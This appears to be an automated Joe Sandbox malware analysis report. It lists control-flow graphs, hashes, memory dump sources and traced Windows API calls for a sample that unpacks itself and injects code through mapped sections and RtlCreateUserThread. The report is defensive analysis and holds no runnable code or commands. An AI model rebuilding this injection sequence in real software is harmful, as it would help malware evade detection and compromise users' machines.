                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 444 277fac0-277fafa call 277fdd3 447 277fafc-277fb2f VirtualAlloc call 277fb4d 444->447 448 277fb48 444->448 450 277fb34-277fb46 447->450 448->448 450->448
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0277FB11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_276d000_veEGy9FijY.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: eb5eb0a3c1011b99183c73d566656f92702fa601819c8ce16ef052d079ef7e9c
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: D0113C79A00208EFDB01DF98CA89E99BBF5AF08351F058095F9489B361D371EA50DF81

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$GetProcAddress.$l
                                                                        • API String ID: 0-2784972518
                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction ID: 3c9d65a91fee16ed02694a8d60e72c2847b7cda024a17a1603b416109df84c65
                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction Fuzzy Hash: 283138B6900609DFDB11CF99C880AEEBBF9FF48324F15414AD841A7290D771EA45CBA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1737299923.000000000276D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_276d000_veEGy9FijY.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction ID: 1a47790a306805ba049ca9d3af912b3f16e3031a1333a2303d1341d45541a37e
                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction Fuzzy Hash: AD118B72340101AFDB44DF59DDC1FA673EAFB89320B298065ED08CB712E675E802CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                        • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                        • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                        • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                        • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                        • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                        • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1737041120.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_25b0000_veEGy9FijY.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction ID: 2d40024afa07c794fc5629f41694a1e46b6c52cf537376d1589a8fc6387ccb3a
                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction Fuzzy Hash: DA01A276A106048FDF22DF24C805BEB33E5FF86216F4545A5D90A972C1E774A9418B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                        • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                        • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                        • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                        • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                        • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                        • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                        • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                        • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                        • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                        • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                        • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                        • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

                                                                        Execution Graph

                                                                        Execution Coverage:8.6%
                                                                        Dynamic/Decrypted Code Coverage:40.7%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:118
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 3248 402e40 3251 402e37 3248->3251 3249 402edf 3251->3249 3252 4018e6 3251->3252 3253 4018f5 3252->3253 3254 40192e Sleep 3253->3254 3255 401949 3254->3255 3257 40195a 3255->3257 3258 401514 3255->3258 3257->3249 3259 401524 3258->3259 3260 4016e0 3259->3260 3261 4015c4 NtDuplicateObject 3259->3261 3260->3257 3261->3260 3262 4015e1 NtCreateSection 3261->3262 3263 401661 NtCreateSection 3262->3263 3264 401607 NtMapViewOfSection 3262->3264 3263->3260 3265 40168d 3263->3265 3264->3263 3266 40162a NtMapViewOfSection 3264->3266 3265->3260 3267 401697 NtMapViewOfSection 3265->3267 3266->3263 3268 401648 3266->3268 3267->3260 3269 4016be NtMapViewOfSection 3267->3269 3268->3263 3269->3260 3365 401542 3366 40153b 3365->3366 3367 4016e0 3366->3367 3368 4015c4 NtDuplicateObject 3366->3368 3368->3367 3369 4015e1 NtCreateSection 3368->3369 3370 401661 NtCreateSection 3369->3370 3371 401607 NtMapViewOfSection 3369->3371 3370->3367 3372 40168d 3370->3372 3371->3370 3373 40162a NtMapViewOfSection 3371->3373 3372->3367 3374 401697 NtMapViewOfSection 3372->3374 3373->3370 3375 401648 3373->3375 3374->3367 3376 4016be NtMapViewOfSection 3374->3376 3375->3370 3376->3367 3270 25b003c 3271 25b0049 3270->3271 3283 25b0e0f SetErrorMode SetErrorMode 3271->3283 3276 25b0265 3277 25b02ce VirtualProtect 3276->3277 3279 25b030b 3277->3279 3278 25b0439 VirtualFree 3282 25b04be LoadLibraryA 3278->3282 3279->3278 3281 25b08c7 3282->3281 3284 25b0223 3283->3284 3285 25b0d90 3284->3285 3286 25b0dad 3285->3286 3287 25b0dbb GetPEB 3286->3287 3288 25b0238 VirtualAlloc 3286->3288 3287->3288 3288->3276 3293 274ea99 3294 274eaa8 3293->3294 3297 274f239 3294->3297 3299 274f254 3297->3299 3298 274f25d CreateToolhelp32Snapshot 3298->3299 3300 274f279 Module32First 3298->3300 3299->3298 3299->3300 3301 274f288 3300->3301 3303 274eab1 3300->3303 3304 274eef8 3301->3304 3305 274ef23 3304->3305 3306 274ef34 VirtualAlloc 3305->3306 3307 274ef6c 3305->3307 3306->3307 3307->3307 3424 402dd0 3425 402ddc 3424->3425 3426 4018e6 8 API calls 3425->3426 3427 402edf 3425->3427 3426->3427 3346 4018f1 3347 4018f6 3346->3347 3348 40192e Sleep 3347->3348 3349 401949 3348->3349 3350 401514 7 API calls 3349->3350 3351 40195a 3349->3351 3350->3351 3411 401915 3412 40191a 3411->3412 3413 4018c6 3411->3413 3414 40192e Sleep 3412->3414 3415 401949 3414->3415 3416 401514 7 API calls 3415->3416 3417 40195a 3415->3417 3416->3417 3289 402f97 3290 402fc1 3289->3290 3291 4030ee 3289->3291 3290->3291 3292 40307c RtlCreateUserThread NtTerminateProcess 3290->3292 3292->3291 3308 25b0001 3309 25b0005 3308->3309 3314 25b092b GetPEB 3309->3314 3311 25b0030 3316 25b003c 3311->3316 3315 25b0972 3314->3315 3315->3311 3317 25b0049 3316->3317 3318 25b0e0f 2 API calls 3317->3318 3319 25b0223 3318->3319 3320 25b0d90 GetPEB 3319->3320 3321 25b0238 VirtualAlloc 3320->3321 3322 25b0265 3321->3322 3323 25b02ce VirtualProtect 3322->3323 3325 25b030b 3323->3325 3324 25b0439 VirtualFree 3328 25b04be LoadLibraryA 3324->3328 3325->3324 3327 25b08c7 3328->3327 3401 402d7b 3403 402d38 3401->3403 3402 4018e6 8 API calls 3404 402dc7 3402->3404 3403->3401 3403->3402 3403->3404 3329 25b0005 3330 25b092b GetPEB 3329->3330 3331 25b0030 3330->3331 3332 25b003c 7 API calls 3331->3332 3333 25b0038 3332->3333 3352 4014fe 3353 401506 3352->3353 3354 401531 3352->3354 3355 4015c4 NtDuplicateObject 3354->3355 3356 4016e0 3354->3356 3355->3356 3357 4015e1 NtCreateSection 3355->3357 3358 401661 NtCreateSection 3357->3358 3359 401607 NtMapViewOfSection 3357->3359 3358->3356 3360 40168d 3358->3360 3359->3358 3361 40162a NtMapViewOfSection 3359->3361 3360->3356 3362 401697 NtMapViewOfSection 3360->3362 3361->3358 3364 401648 3361->3364 3362->3356 3363 4016be NtMapViewOfSection 3362->3363 3363->3356 3364->3358

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 112 4018c5 106->112 113 4018bc-4018e3 call 401193 106->113 112->113 115->105 117 4015e1-401605 NtCreateSection 115->117 118 401661-401687 NtCreateSection 117->118 119 401607-401628 NtMapViewOfSection 117->119 118->105 121 40168d-401691 118->121 119->118 123 40162a-401646 NtMapViewOfSection 119->123 121->105 124 401697-4016b8 NtMapViewOfSection 121->124 123->118 126 401648-40165e 123->126 124->105 127 4016be-4016da NtMapViewOfSection 124->127 126->118 127->105 129 4016e0 call 4016e5 127->129
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 159 4018c5 153->159 160 4018bc-4018e3 call 401193 153->160 159->160 162->152 164 4015e1-401605 NtCreateSection 162->164 165 401661-401687 NtCreateSection 164->165 166 401607-401628 NtMapViewOfSection 164->166 165->152 168 40168d-401691 165->168 166->165 170 40162a-401646 NtMapViewOfSection 166->170 168->152 171 401697-4016b8 NtMapViewOfSection 168->171 170->165 173 401648-40165e 170->173 171->152 174 4016be-4016da NtMapViewOfSection 171->174 173->165 174->152 176 4016e0 call 4016e5 174->176
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 203 4018c5 197->203 204 4018bc-4018e3 call 401193 197->204 203->204 206->196 208 4015e1-401605 NtCreateSection 206->208 209 401661-401687 NtCreateSection 208->209 210 401607-401628 NtMapViewOfSection 208->210 209->196 212 40168d-401691 209->212 210->209 214 40162a-401646 NtMapViewOfSection 210->214 212->196 215 401697-4016b8 NtMapViewOfSection 212->215 214->209 217 401648-40165e 214->217 215->196 218 4016be-4016da NtMapViewOfSection 215->218 217->209 218->196 220 4016e0 call 4016e5 218->220
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_haevsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 242 4018c5 236->242 243 4018bc-4018e3 call 401193 236->243 242->243 245->235 247 4015e1-401605 NtCreateSection 245->247 248 401661-401687 NtCreateSection 247->248 249 401607-401628 NtMapViewOfSection 247->249 248->235 251 40168d-401691 248->251 249->248 253 40162a-401646 NtMapViewOfSection 249->253 251->235 254 401697-4016b8 NtMapViewOfSection 251->254 253->248 256 401648-40165e 253->256 254->235 257 4016be-4016da NtMapViewOfSection 254->257 256->248 257->235 259 4016e0 call 4016e5 257->259
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
